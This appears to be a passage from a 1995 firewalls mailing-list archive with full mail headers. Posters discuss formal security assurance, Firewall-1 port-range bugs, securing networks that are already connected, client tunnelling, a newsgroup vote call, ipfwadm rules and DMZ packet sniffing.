Kaplan said: >>>The only thing I'd add is that the "make them be treated differently" be >>>stiffened to something like "proveably force them to be treated according >>>to the security policy." Marcus replied: >> Nope. Forget proofs. Come on. The proof guys have been >>ploughing that field for years and have come up empty. The reality >>is that proofs don't scale well with complexity, and in case you >>haven't noticed, every release of every program is 10% larger and >>more complex than the previous. The proofnicks have had their turn >>and it's been a dead loss. Proofs may be "down" but don't count them out yet. It's been harder than the pundits expected to field a highly assured system, and the assurance hasn't had the coverage that people expected. It covers design flaws that contradict formally specified security requirements. That's not -all- security requirements for a usable system, but it's worthwhile if it covers -critical- security requirements. Can the formal assurance effort find bugs in a system design? The answer is Yes. Will it find *all* bugs? No more than any other technique. The tradeoff is always mission and threat against the costs of countermeasures. Formal assurance is an expensive countermeasure against design flaws. Customers will pay for it if they worry enough about security requirements that can be fought with formal assurance. Will commercial customers pay for it? It all depends on how the public discourse on threats evolves over the years. It may in fact be "dead" till the end of the decade/century, but then, maybe not. If formal assurance falls on the "sublime" side of bug finding, then perhaps public challenges fall on the other end. In both cases the objective is the same: Find Bugs. In our experience here at Secure Computing, both techniques have been Very Effective. So far, only Uncle Sam is willing to pay for formal assurance. Ray Kaplan continued: >Yep, but I think I may have mislead you. The only "proofs" that I require >when I do a security assessment is that the security policy is actually >implemented in a way that actually supports the business goals that are >supposed to underpin the thing in the first place! I'm not a math or >crypto or trusted system or defense guy. I'm only asking how a given mix >of security features meets the problems that it was deployed to solve. How do you tell for sure if a given mix of security features meets the problems it was deployed to solve? A rhetorical question, of course. You apply a mixture of logic, common sense, and experience. The formal proof techniques were stuck into the Orange Book because people found that you couldn't create effective mandatory access control simply by slapping labels into the OS. Common sense and experience supported that approach, since they needed to distinguish between different levels, and that's what the labels did. As we now know, that generally made attacks easier, since valuable information was conveniently marked. Hey, formal assurance is expensive. But when I look at the hot backup disaster recovery sites paid for by big companies that have a lot to lose, I realize that formal security assurance might not always be "too expensive for commercial security." They'll pay big bucks, but only after a few goats have been slaughtered. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Aug 4 16:36:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17104 for firewalls-outgoing; Fri, 4 Aug 1995 16:06:26 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17051 for ; Fri, 4 Aug 1995 16:06:19 -0700 From: strata@virtual.net Received: from virtual-city.virtual.net(140.174.91.20) by miles via smap (V1.3) id sma017035; Fri Aug 4 16:05:50 1995 Received: by virtual.net (4.1/SMI-4.1) id AA27924; Fri, 4 Aug 95 16:11:23 PDT Date: Fri, 4 Aug 95 16:11:22 PDT Reply-To: strata@virtual.net To: firewalls@greatcircle.com Subject: Firewall-1 bugs/specifications? Message-Id: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In looking at Firewall-1, it seems that (in the hour+ of messing with it) there is no way to allow for things like ftp-data or domain zone transfers. I tried to create a service object that would accept requests from machine A high-numbered TCP ports to machine B port 20 (ftp-data) and couldn't do so, even when I quit fwui and added it to objects.C by hand. When I restarted fwui and installed the filter, the new ftp-data object I had created was ineffectual, and the "source port range" fields had my numbers but were grayed out. FW-1 seems only to like source port ranges for udp objects, I haven't been able to get them to work on tcp objects. This is unacceptable. The create objects handlers are extremely finicky, and insist sometimes that they have not been supplied with an object type or name at random. Often closing and reopening the app itself, or the object window, is the only fix. Am I missing something here, like a later release than 1.0.7c? Have other folks successfully built huge hairy filters with tcp source port ranges and happy joyful packets bounding gracefully between the interfaces? Should I build up some more forehead calluses banging my head against the (Fire)Wall(1) or give up now and wait another year? I get one or two calls a week from clients who are getting it by default because "Sun sells it, so it must be the official good firewall product" (the "buy IBM" approach) and am tired of saying "I can't recommend it, sorry". Anyone out there want to differ? ************************************************************************* PGP-- Phil Gets Prosecuted (Persecuted?) Support the Zimmerman Legal Legal Defense Fund ==> Email: zldf@clark.net http://www.netresponse.com/zldf ************************************************************************* INTERNET Installations, Training, Publishing, Security M. Strata Rose 408-733-UNIX (8649) strata@virtual.net ************************************************************************* From firewalls-owner Fri Aug 4 17:34:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA21360 for firewalls-outgoing; Fri, 4 Aug 1995 17:24:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA21258 for ; Fri, 4 Aug 1995 17:24:22 -0700 From: silveira@nutecpa.nutec.tche.br Received: from unknown(200.17.171.89) by miles via smap (V1.3) id sma021086; Fri Aug 4 17:23:37 1995 Received: (from root@localhost) by nutpagw.nutec.tche.br (8.6.9/8.6.9) id VAA11375 for ; Fri, 4 Aug 1995 21:52:16 -0300 Received: from unknown(200.17.174.65) by nutpagw.nutec.tche.br via smap (V1.3) id sma011287; Fri Aug 4 21:51:46 1995 Received: from canario by nutecpa.nutec.tche.br id aa02503; 4 Aug 95 21:23 BRA Received: from dodo by canario.canario.nutecsp.br id aa17171; 4 Aug 95 21:16 BST MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Date: Fri, 04 Aug 95 21:19:13 -0300 Subject: How to handle ongoing projects? To: firewalls@greatcircle.com X-Mailer: SPRY Mail Version: 04.00.06.14 Message-ID: <9508042116.aa17171@canario.canario.nutecsp.br> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello all! How can we, as consultants, handle the situation when the customer (or our contacts at the customer) have already begun to use an Internet connection, but without any security whatsoever and then, after a while, they call on you to implement a firewall? It seems to me that we should unplug the network ASAP, at perform a rigorous examination of the (possibly) compromised network. However, this often goes against a number of end user expectations. How are you guys handling it? Regards, Fernando -- Fernando da Silveira Montenegro E-mail: silveira@nutec.com Nutec Informatica S.A. Phone.: +55-11-505-5728 Rua Florida, 1821/4th floor Fax...: +55-11-505-1918 Sao Paulo, SP BRAZIL 04565-001 From firewalls-owner Fri Aug 4 18:04:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA21393 for firewalls-outgoing; Fri, 4 Aug 1995 17:28:28 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA21377 for ; Fri, 4 Aug 1995 17:28:25 -0700 From: cmcurtin@clipper.cb.att.com Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma021373; Fri Aug 4 17:27:40 1995 Received: from clipper.cb.att.com by ig1.att.att.com id AA06773; Fri, 4 Aug 95 16:33:19 EDT Received: by clipper.cb.att.com (4.1/EMS-1.1 SunOS) id AA13350; Fri, 4 Aug 95 16:33:34 EDT Received: by clipper.cb.att.com (4.1/EMS-1.1 SunOS) id AA13339; Fri, 4 Aug 95 16:33:25 EDT Message-Id: <9508041633.ZM13337@clipper.cb.att.com> Date: Fri, 4 Aug 1995 16:33:20 -0400 In-Reply-To: "Goetz von Escher" "Tunneling AOL and Compuserve" (Jul 27, 10:17pm) References: <199506090211.WAA19817@janet.advsys.com> <9507272217.ZM22142@baby> X-Mailer: Z-Mail (3.2.1 15feb95) To: "Goetz von Escher" , firewalls@greatcircle.com Subject: Re: Tunneling AOL and Compuserve Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Jul 27, 10:17pm, Goetz von Escher wrote: > Before I go and study those protocols and their clients, would anybody > like to share his experience? It is rumored that there is a feature in the CompuServe client that allows the client and server to change roles. *Very* bad if you're doing tunneling through your firewall. When I asked CompuServe about this, they simply never replied, even though we had been carrying on a dialogue for a few days. When I contacted AOL for information about what DNS names their client will try to talk to, what ports, etc., and some general info about their client, I didn't get a reply. I mailed their postmaster account three times, and once mailed their technical and zone contact. I got a prompt apology for not getting a response, a promise for a response, and that's the last that I heard from them. As far as I'm concerned, if folks at these sites aren't willing to give me the information I need, then I'm not willing to provide a means for folks at my site to be their customers through our firewall here. -- C Matthew Curtin AT&T Bell Labs Internet Gateway Applications Group http://www.att.com/homes/matt_curtin.html PGP KeyID:cmcurtin@clipper.cb.att.com From firewalls-owner Fri Aug 4 18:08:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA22120 for firewalls-outgoing; Fri, 4 Aug 1995 17:55:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA22104 for ; Fri, 4 Aug 1995 17:55:40 -0700 Received: from csli.stanford.edu(36.9.0.46) by miles via smap (V1.3) id sma022100; Fri Aug 4 17:54:53 1995 Received: from Csli.Stanford.EDU (localhost.Stanford.EDU [127.0.0.1]) by Csli.Stanford.EDU (8.6.11/8.6.11) with ESMTP id RAA21717; Fri, 4 Aug 1995 17:53:15 -0700 Message-Id: <199508050053.RAA21717@Csli.Stanford.EDU> To: silveira@nutecpa.nutec.tche.br cc: firewalls@GreatCircle.COM Subject: Re: How to handle ongoing projects? In-reply-to: Your message of Fri, 04 Aug 1995 21:19:13 -0300. <9508042116.aa17171@canario.canario.nutecsp.br> Date: Fri, 04 Aug 1995 17:53:13 -0700 From: Christian Wettergren Sender: firewalls-owner@GreatCircle.COM Precedence: bulk | How can we, as consultants, handle the situation when the customer (or our | contacts at the customer) have already begun to use an Internet | connection, but without any security whatsoever and then, after a | while, they call on you to implement a firewall? | It seems to me that we should unplug the network ASAP, at perform a | rigorous examination of the (possibly) compromised network. However, | this often goes against a number of end user expectations. How are you | guys handling it? Easy. Find their unprotected competitior, cook up some fake data, get the management of your place for a demonstration, fake an attack on their competitor, the whole attack should take slightly more than on Hollywood film (say total of 5 min). Show the management the cooked-up data (could probably be snipped from their annual report), and tell them your service is available to the competitor as well. (Faking the attack to protect yourself, of course.) Only joking, ONLY joking, I said. I think I'll second that question, but with the added complication of my case being an University. (And it's not Stanford I'm referring to!) So, how do you do these things? /Christian Wettergren From firewalls-owner Fri Aug 4 20:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA27045 for firewalls-outgoing; Fri, 4 Aug 1995 19:55:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA27006 for ; Fri, 4 Aug 1995 19:55:40 -0700 Received: from noc1.mid.net(198.247.250.15) by miles via smap (V1.3) id sma026911; Fri Aug 4 19:55:27 1995 Received: (from alan@localhost) by noc1.mid.net (8.6.10/8.6.9) id VAA22390; Fri, 4 Aug 1995 21:50:31 -0500 From: Alan Hannan Message-Id: <199508050250.VAA22390@noc1.mid.net> Subject: Re: How to handle ongoing projects? To: cwe@Csli.Stanford.EDU (Christian Wettergren) Date: Fri, 4 Aug 1995 21:50:30 -0500 (CDT) Cc: silveira@nutecpa.nutec.tche.br, firewalls@GreatCircle.COM In-Reply-To: <199508050053.RAA21717@Csli.Stanford.EDU> from "Christian Wettergren" at Aug 4, 95 05:53:13 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1403 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -->| How can we, as consultants, handle the situation when the customer (or our -->| contacts at the customer) have already begun to use an Internet -->| connection, but without any security whatsoever and then, after a -->| while, they call on you to implement a firewall? With a transparent firewall such as MIDnet's SecurIt, which is based on TIS's Gauntlet, the installation can be totally painless if: 1) The internal users are not using UDP to the Internet and 2) The internal users are willing and able to transfer all of their public servers to the outside DMZ Of course the situation becomes a bit more complex when they are using UDP or when they demand to have the outside world come into their "protected network". However, I have to honestly say that most of the organizations and companies we have worked with have found their users very pleased with the firewall installation, and extremely happy with the ease of the transition. Likewise, I've found that it tends to be tremendous benefit for the administrator, as it forces him to understand how his network is laid out, and what traffic and services his network passes to the Internet. $0.02 -- Alan Hannan Email: alan@mid.net Network Systems Administrator Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 "Even paranoids have enemies" - Kissinger From firewalls-owner Fri Aug 4 20:32:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA29240 for firewalls-outgoing; Fri, 4 Aug 1995 20:28:14 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA29188 for ; Fri, 4 Aug 1995 20:28:06 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma029175; Fri Aug 4 20:27:41 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA28325; Fri, 4 Aug 95 23:22:55 -0400 Date: Fri, 4 Aug 95 23:22:54 -0400 Message-Id: <9508050322.AA28325@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: NCSA Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > CARLISLE, Pa.--(BUSINESS WIRE)--Aug. 3, 1995--The National Computer >Security Assn. (NCSA) has organized the Firewall Product Developers' >Consortium (FWPD), to bring together the major vendors of network and >Internet firewall products. Am sure that they have the same goals for firewalls as they had for viruses. Warmly, Padgett From firewalls-owner Fri Aug 4 21:03:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00416 for firewalls-outgoing; Fri, 4 Aug 1995 20:51:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA00387 for ; Fri, 4 Aug 1995 20:51:28 -0700 Received: from hawksbill.sprintmrn.com(199.11.1.3) by miles via smap (V1.3) id sma000342; Fri Aug 4 20:51:10 1995 Received: by hawksbill.sprintmrn.com (5.65/1.34) id AA21712; Fri, 4 Aug 95 23:49:11 -0500 From: paul@hawksbill.sprintmrn.com (Paul Ferguson) Message-Id: <9508050449.AA21712@hawksbill.sprintmrn.com> Subject: Re: NCSA To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Date: Fri, 4 Aug 1995 23:49:11 -0500 (EST) Cc: firewalls@greatcircle.com (Firewalls List) In-Reply-To: <9508050322.AA28325@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Aug 4, 95 11:22:54 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 794 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > CARLISLE, Pa.--(BUSINESS WIRE)--Aug. 3, 1995--The National Computer > >Security Assn. (NCSA) has organized the Firewall Product Developers' > >Consortium (FWPD), to bring together the major vendors of network and > >Internet firewall products. > > Am sure that they have the same goals for firewalls as they had for viruses. > > Warmly, > Padgett > That's not saying very much, Padgett, as you well know. ;-) - paul _______________________________________________________________________________ Paul Ferguson US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul@hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From firewalls-owner Sat Aug 5 01:30:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA07460 for firewalls-outgoing; Sat, 5 Aug 1995 01:18:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA07452 for ; Sat, 5 Aug 1995 01:18:32 -0700 Received: from cs.huji.ac.il(132.65.16.10) by miles via smap (V1.3) id sma007450; Sat Aug 5 01:18:15 1995 Received: from picton.cs.huji.ac.il by cs.huji.ac.il with SMTP id AA04068 (5.67b/HUJI 4.153 for ); Sat, 5 Aug 1995 11:17:11 +0300 Received: by picton.cs.huji.ac.il with SMTP id AA00810 (5.65c/HUJI 4.114); Sat, 5 Aug 1995 11:16:58 +0300 Message-Id: <199508050816.AA00810@picton.cs.huji.ac.il> To: strata@virtual.net Cc: firewalls@greatcircle.com Subject: Re: Firewall-1 bugs/specifications? In-Reply-To: Your message of Fri, 4 Aug 95 16:11:22 PDT . From: Amos Shapira Date: Sat, 05 Aug 1995 11:16:57 +0300 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message you write: | |In looking at Firewall-1, it seems that (in the hour+ of messing with |it) there is no way to allow for things like ftp-data or domain zone |transfers. I tried to create a service object that would accept requests |Am I missing something here, like a later release than 1.0.7c? Have |"I can't recommend it, sorry". Anyone out there want to differ? I only know about firewalls-1's features from checkpoint's WEB site (URL:http://www.checkpoint.com/). And from what I read there, firewall-1 will automatically open a port number mentioned over an ftp-data connection. Specifically, look at the following page: http://www2.checkpoint.com:8000/ftp.html (from the "quote of the day" I see there right now it looks like they are watching this mailing list, and the quote, from Marcus J. Ranum, is just about the subject of your question). Cheers, --Amos --Amos Shapira | "Of course Australia was marked for 133 Shlomo Ben-Yosef st. | glory, for its people had been chosen Jerusalem 93 805 | by the finest judges in England." ISRAEL amoss@cs.huji.ac.il | -- Anonymous From firewalls-owner Sat Aug 5 01:58:54 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA06997 for firewalls-outgoing; Sat, 5 Aug 1995 01:09:33 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA06989 for ; Sat, 5 Aug 1995 01:09:31 -0700 Received: from flying.fish.com(140.174.97.13) by miles via smap (V1.3) id sma006987; Sat Aug 5 01:08:35 1995 Received: (from zen@localhost) by flying.fish.com (8.7.1.3 (Alpha)/8.7.1.3) id BAA03267; Sat, 5 Aug 1995 01:07:22 -0700 Date: Sat, 5 Aug 1995 01:07:22 -0700 From: d Message-Id: <199508050807.BAA03267@flying.fish.com> To: firewalls@greatcircle.com Subject: 2nd CFV: comp.security.firewalls Organization: Vicious Fishes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here's your last chance to vote for the firewalls newsgroup; yep or nope or whatever. ***DO NOT SEND YOUR VOTE TO ME!!!*** Follow the directions inside here - send your mail to: "vote@dogwood.com". -- d LAST CALL FOR VOTES (of 2) unmoderated group comp.security.firewalls Newsgroups line: comp.security.firewalls Anything pertaining to network firewall security. Votes must be received by 23:59:59 UTC, 14 Aug 1995. This vote is being conducted by a neutral third party. For voting questions only contact Dave Cornejo . For questions about the proposed group contact Dan Farmer . This CFV will also be sent to the mailing list firewalls@greatcircle.com after it has been posted to Usenet. CHARTER The purpose of comp.security.firewalls is to serve as a central location in which firewalls can be discussed and investigated. Questions, comments, discoveries, code snippets and new product information can be discussed, among other issues. It will be unmoderated and open to discussion of all aspects of firewalls. RATIONALE There is a need for a newsgroup to directly educate, discuss, and propogate information to the Internet community about firewalls, because more and more sites are setting up firewalls, and many people don't understand the technical or philosophical issues, can't spend the time keeping up with the latest information, and don't have a proper forum to discuss new ideas. There is currently no newsgroup which is specifically for this fairly complex subject. HOW TO VOTE Send MAIL to: vote@dogwood.com Just Replying should work if you are not reading this on a mailing list. Your mail message should contain a subject line with the group name comp.security.firewalls and one of the following statements in the message body: I vote YES on comp.security.firewalls I vote NO on comp.security.firewalls I vote ABSTAIN on comp.security.firewalls I vote CANCEL on comp.security.firewalls You may also ABSTAIN in place of YES/NO - this will not affect the outcome. Anything else may be rejected by the automatic vote counting program. The votetaker will respond to your received ballots with a personal acknowledgement by mail - if you do not receive one within several days, try again. It's your responsibility to make sure your vote is registered correctly. One vote counted per person, no more than one per account. Addresses and votes of all voters will be published in the final voting results list. Votes from anonymous and system accounts will not be accepted. Votes mailed from WWW/HTML/CGI forms are also not acceptable. Fraudulent votes will be deleted from the results. Votes received at an address other than vote@dogwood.com will not be counted. BOUNCED ACKNOWLEDGEMENTS If your email address appears below then your vote acknowledgement was bounced back to the vote taker - there is no need to vote again. UDSD007@DSIBM.OKLADOT.STATE.OK.US mauer@fsd.com itkat@cix.compulink.co.uk ghigi@iper.net jnewman@hazel.EnGarde.com jbs@nirvana.cr.mci.com Warren_Moore%CBIS@notes.cbis.com ghigi@iper.net From firewalls-owner Sat Aug 5 08:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA13710 for firewalls-outgoing; Sat, 5 Aug 1995 07:44:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA13702 for ; Sat, 5 Aug 1995 07:44:41 -0700 Received: from xcrsnyder.ge_xc.dialup.net(158.254.10.56) by miles via smap (V1.3) id sma013700; Sat Aug 5 07:44:12 1995 Received: from janet.advsys.com (rsnyder@localhost [127.0.0.1]) by janet.advsys.com (8.7.Beta.10/8.7.Beta.10) with ESMTP id KAA02766; Sat, 5 Aug 1995 10:42:48 -0400 Message-Id: <199508051442.KAA02766@janet.advsys.com> X-Mailer: exmh version 1.6.2 7/18/95 To: quito@constructa.cl (Francisco Javier cabezas) cc: Firewalls@GreatCircle.COM Subject: Re: about ipfwadm in Linux In-reply-to: Your message of "Fri, 04 Aug 1995 12:18:00 CST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 05 Aug 1995 10:42:45 -0400 From: Bob Snyder Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I need to know something about IPFWADM.... > > What are "the blocking rules", "the forwarding rules" and > "the IP accountting rules " ??? > What's the mean ? My understanding (which may not be correct) is that the accounting rules simply set up counters for packets that fit the rule defined, the forwarding rules control what packets will be forwarded from one interface to another, and the blocking rules will control what will be allow access to the local machine. Bob From firewalls-owner Sat Aug 5 08:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA13748 for firewalls-outgoing; Sat, 5 Aug 1995 07:52:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA13739 for ; Sat, 5 Aug 1995 07:52:41 -0700 Received: from panix3.panix.com(198.7.0.4) by miles via smap (V1.3) id sma013737; Sat Aug 5 07:51:57 1995 Received: from wallyman (wallynet.dialup.access.net [166.84.216.58]) by panix3.panix.com (8.6.12/8.6.12+PanixU1.1) with SMTP id KAA28824 for ; Sat, 5 Aug 1995 10:50:45 -0400 Message-Id: <199508051450.KAA28824@panix3.panix.com> X-Sender: wallynet@panix.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 1 (Highest) Date: Sat, 05 Aug 1995 10:43:38 -0400 To: firewalls@greatcircle.com From: wallynet@panix.com (Walter F. Inetman) Subject: Build a real firewall... Recycle SecurID/Retina/DNA try the ATF -w- EEG's and universal passports Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey Padgett, Brian and the other PHD's: If you think this is off topic try again... Protection systems have resulted from unwanted intrusion, ya? Polymorphism resulted from ____ ??? Today on CNN, the question of whether or not cognisance of deviant behavior makes you suspect for further investigation is no longer an issue. Being aware of hacking methodology makes YOU suspect! As your counsel will advise you; Unless you get pulled over for a vehicle violation, or some other idiocy, in the USA you can not be randomly interrogated. Your mind is your sovereign property however, access to your thoughts via bio-technology (enhanced EEG) ie: Skipjack infiltration, is now legal with precedents. No sweat, all the major anti hackers can protect themselves with a bullet proof FIREWALL. NOT!!! The question is: Did Jefferson intend the authority of the law (including current US Code Statutes) to have the authority to probe your bio-rhythms and extrapolate potential guilt? Hymmmm.... PS: If this were an editorial there would be a solution. In this case, I think not! Please, let some legal eagle kill this trash before mnufactures are encouraged to distribute computers with capacitance sensors in their keyboards. The challenge for developers to counter information theft is apparent. The requisite is clear and the time is now. Then again big brother might not be such a bad thing.... --- Walt """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" Ultimately, the strongest argument for the people to retain the right to keep and bear arms, is to protect themselves against tyranny in government. --Thomas Jefferson RE: gopher://uacsc2.albany.edu:70/00/newman/crjdoc/engwale.doc http://www.pls.com:8001/his/95.htm gopher://hamilton1.house.gov/11d:/uscode/title18 gopher://wiretap.spies.com:70/00/Gov/US-State/compcrime.tx http://io.com/SS/texaslaw.html Those of us who are in Boston 8-7/8-8 (AYRIEE!!!) or in Europe (CAIO...) [the rest of you get a life] wear your sunglasses on your head B:-) . """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" / ) / / _( (_ _ ________________________________________________ (((\ \> /_> / \ (\\\\ \_/ / | This guy here. He's a troublemaker. | \ / | Always sticking his nose into how things | \ _/ | like government, media, ads, PR, etc works. | / / \___ ___________________________________________/ / / |/ / / / """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" ____________ ____/--\____ \______ ___) ( _ ____) "Damn it Jim!, __| |____/ / `--' I'm Warf not a Doctor!" ) `|=(- \------------' From firewalls-owner Sat Aug 5 10:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA16201 for firewalls-outgoing; Sat, 5 Aug 1995 09:33:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA16189 for ; Sat, 5 Aug 1995 09:33:31 -0700 Received: from gate.barr.com(199.199.125.133) by miles via smap (V1.3) id sma016183; Sat Aug 5 09:33:08 1995 Received: from wpo.barr.com by sun6.barr.com (4.1/SMI-4.1) id AA25598; Sat, 5 Aug 95 11:32:00 CDT Received: from Barr_Domain_1-Message_Server by wpo.barr.com with Novell_GroupWise; Sat, 05 Aug 1995 11:32:09 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Sat, 05 Aug 1995 11:31:39 -0600 From: "Steve P. Devore" To: firewalls@greatcircle.com Subject: Re[2]: Someone knocking at our door... -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I agree. I am concerned that a smart cracker would not try everything in the book at each site he goes to. He would instead try one thing, and if that didn't work move on. That way it would be real easy to dismiss it a harmless, although this person could be spending hours a day logging into site after site until he finds an unprotected one. If we give a short note to the postmaster it can alert them to the problem. >>> Bierdz, Philip 8/1/95, 11:52am >>> I don't believe so. I'd contact the postmaster anyway (if you feel it was a valid probe). Being a postmaster myself, I'd like to know if a user was suspect of such a thing from any site. If I got enough calls from other sites with the same user as being "suspect"... I thing we all get the point. ---------------------------------------------------------------------- Philip J. Bierdz ||||||||||||||||||||||||||||||||||| Senior Systems Support Specialist |============DISCLAIMER============ Moraine Valley Community College | My opinions are not necessarily Palos Hills, IL - USA | my own but those of my employer |================================== bierdz@moraine.cc.il.us ||||||||||||||||||||||||||||||||||| ---------------------------------------------------------------------- From firewalls-owner Sat Aug 5 12:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18374 for firewalls-outgoing; Sat, 5 Aug 1995 11:44:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA18366 for ; Sat, 5 Aug 1995 11:44:05 -0700 Received: from moose.usmcs.maine.edu(130.111.131.39) by miles via smap (V1.3) id sma018364; Sat Aug 5 11:43:16 1995 Received: by moose.usmcs.maine.edu (5.57/Ultrix3.0-C) id AA25243; Sat, 5 Aug 95 14:42:15 -0400 Received: by doc.usmcs.maine.edu; (5.65/1.1.8.2/28Mar95-0848PM) id AA02063; Sat, 5 Aug 1995 14:42:07 -0400 From: Edward Maillet Message-Id: <9508051842.AA02063@doc.usmcs.maine.edu> Subject: Packet sniffers in the DMZ. Do you sniff? To: firewalls@greatcircle.com Date: Sat, 5 Aug 1995 14:42:06 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 603 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey all, I was wondering how many firewallers use packet sniifers to suck ALL packets on their DMZ segment or other "outside" net. Any one know of a good DOS/Win/Win95 packet sucker with decent analysis/report generation capabilities? Here's the environment I'm think about Internet ------>[Router]----DMZ-----[Firewall]-----Inside | | | | | [Sniffer] | |--[WWW etc] | |--[Sniffer] ----- Ed Maillet maillet@usmcs.maine.edu From firewalls-owner Sat Aug 5 12:33:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA18968 for firewalls-outgoing; Sat, 5 Aug 1995 12:24:11 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA18958 for ; Sat, 5 Aug 1995 12:24:08 -0700 Received: from relay4.uu.net(192.48.96.14) by miles via smap (V1.3) id sma018954; Sat Aug 5 12:24:02 1995 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQzbmz22376; Sat, 5 Aug 1995 15:22:54 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA07898; Sat, 5 Aug 95 15:14:50 EDT Date: Sat, 5 Aug 1995 15:14:48 -0400 (EDT) From: Sick Puppy Subject: And now for something completely different To: firewalls@GreatCircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On the assumption that no reference is going to be made to any agency of any government, does anyone know of a firewall being successfully hacked with the help of equipment designed to receive, synchronize and display van Eck radiation? My dad, who is a history buff and still supports the Military - bless his stoopid heart, says that back in the sixties some military cryptography equipment leaked clear text on van Eck radiation bands so strongly that the places the machines were installed in had to have special shielding. That leads me to ask, is anyone running firewalls on Tempest class equipment? If you don't know what van Eck radiation is, then: 1) your government (regardless of country) does not want you to know; 2) you can follow the advice of the Alt.2600.FAQ and read chapter 7 of Information Warfare by Winn Schwartau, published by Thunder's Mouth Press, New York, ISBN 1-56025-080-1 which explains what it is. Lieutenant Sick Puppy the Cat_Eating_Dawg Photonics & Tachyonic Systems Engineer of the Steath Starship Dark Matter From firewalls-owner Sat Aug 5 14:30:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA22638 for firewalls-outgoing; Sat, 5 Aug 1995 14:03:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA22630 for ; Sat, 5 Aug 1995 14:03:35 -0700 Received: from 